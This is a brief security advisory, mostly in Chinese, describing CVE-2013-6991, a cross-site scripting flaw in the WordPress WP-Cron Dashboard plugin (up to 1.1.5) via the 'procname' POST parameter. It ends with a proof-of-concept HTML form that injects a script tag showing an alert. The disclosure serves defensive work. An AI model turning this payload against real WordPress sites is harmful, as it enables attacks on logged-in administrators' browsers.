CVE ID:CVE-2013-6991
WordPress是一款内容管理系统。
由于"procname" HTTP POST参数传递到"/wp-admin/tools.php"脚本的参数未能充分过滤用户提供的数据, 远程攻击者可以欺骗登录的管理员访问恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress WP-Cron Dashboard<=1.1.5
厂商未提供官方的更新补丁,用户可使用非官方补丁:
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<form action="http://[host]/wp-admin/tools.php?page=wp-cron-dashboard" method="post" name="main">
<input type="hidden" name="procname" value='<script>alert("immuniweb");</script>'>
<input type="hidden" name="submit" value='1'>
<input type="submit" id="btn">
</form>